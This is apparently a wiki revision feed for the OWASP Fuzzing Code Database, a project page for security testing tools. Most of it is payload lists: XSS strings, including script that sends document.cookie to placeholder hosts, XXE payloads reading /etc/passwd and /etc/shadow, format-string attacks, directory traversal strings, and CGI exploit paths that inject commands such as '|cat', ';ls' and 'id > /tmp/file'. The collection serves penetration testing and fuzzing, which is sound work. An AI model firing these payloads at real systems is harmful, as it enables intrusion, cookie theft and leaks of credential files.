&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80112</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80112"/>
				<updated>2010-03-18T09:28:47Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Microsoft URLs (18 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Interesting IIS Files &amp;amp; Directories (17 March, 2009)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. &lt;br /&gt;
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.&lt;br /&gt;
&lt;br /&gt;
.printer&lt;br /&gt;
/%NETHOOD%/&lt;br /&gt;
/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/Exadmin/&lt;br /&gt;
/ExchWeb/&lt;br /&gt;
/Exchange/&lt;br /&gt;
/Microsoft-Server-ActiveSync/&lt;br /&gt;
/OMA/&lt;br /&gt;
/OWA/&lt;br /&gt;
/Public/&lt;br /&gt;
/_layouts/alllibs.htm&lt;br /&gt;
/_layouts/settings.htm&lt;br /&gt;
/_layouts/userinfo.htm&lt;br /&gt;
/_vti_bin/&lt;br /&gt;
/_vti_bin/_vti_aut/fp30reg.dll&lt;br /&gt;
/_vti_pvt/&lt;br /&gt;
/_WEB_INF/&lt;br /&gt;
/a%5c.aspx&lt;br /&gt;
/adovbs.inc&lt;br /&gt;
/aspnet_files/&lt;br /&gt;
/certcontrol/&lt;br /&gt;
/certenroll/&lt;br /&gt;
/certsrv/&lt;br /&gt;
/exchange/root.asp&lt;br /&gt;
/forum.asp&lt;br /&gt;
/forum_arc.asp&lt;br /&gt;
/forum_professionnel.asp&lt;br /&gt;
/iisadmin/&lt;br /&gt;
/iishelp/&lt;br /&gt;
/iishelp/iis/misc/default.asp&lt;br /&gt;
/iissamples/&lt;br /&gt;
/imprimer.asp&lt;br /&gt;
/includes/adovbs.inc&lt;br /&gt;
/msadc/&lt;br /&gt;
/null.htw&lt;br /&gt;
/pbserver/pbserver.dll&lt;br /&gt;
/postinfo.html&lt;br /&gt;
/rubrique.asp&lt;br /&gt;
/scripts/&lt;br /&gt;
/share/&lt;br /&gt;
/tsweb/&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.asp&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
index.shtml&lt;br /&gt;
x.htw&lt;br /&gt;
x.ida&lt;br /&gt;
x.idq&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
